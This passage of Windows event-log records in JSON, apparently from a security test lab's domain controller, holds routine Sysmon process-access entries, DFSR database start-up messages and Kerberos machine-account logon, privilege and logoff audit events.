{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:45.763\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2079-5F25-0000-001003350600}\r\nTargetProcessId: 3308\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:45.763","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2079-5F25-0000-001003350600}","TargetProcessId":"3308","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":102,"SourceName":"ESENT","Task":1,"RecordNumber":12120,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2904) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine (10.00.14393.0000) is starting a new instance (0).","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 07:58:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":105,"SourceName":"ESENT","Task":1,"RecordNumber":12121,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2904) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine started a new instance (0). (Time=0 seconds) \r\n \r\nInternal Timing Sequence: [1] 0.000, [2] 0.000, [3] 0.000, [4] 0.032, [5] 0.000, [6] 0.000, [7] 0.015, [8] 0.000, [9] 0.000, [10] 0.000.","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 07:58:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":326,"SourceName":"ESENT","Task":1,"RecordNumber":12122,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"DFSRs (2904) \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db: The database engine attached a database (1, \\\\.\\C:\\System Volume Information\\DFSR\\database_F254_F862_54F8_2ACD\\dfsr.db). (Time=0 seconds) \r\n \r\nInternal Timing Sequence: [1] 0.000, [2] 0.000, [3] 0.016, [4] 0.000, [5] 0.000, [6] 0.000, [7] 0.000, [8] 0.000, [9] 0.000, [10] 0.000, [11] 0.000, [12] 0.000. \r\nSaved Cache: 0 0","Category":"General","Opcode":"Info","EventReceivedTime":"2020-08-01 07:58:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220413,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64031\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64031","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220414,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64031\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50132\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64031","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50132","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220415,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64031\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x64031","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220416,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64084\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64084","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220417,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64084\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50133\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64084","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50133","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220418,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x640D6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x640d6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220419,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x640D6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50135\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was 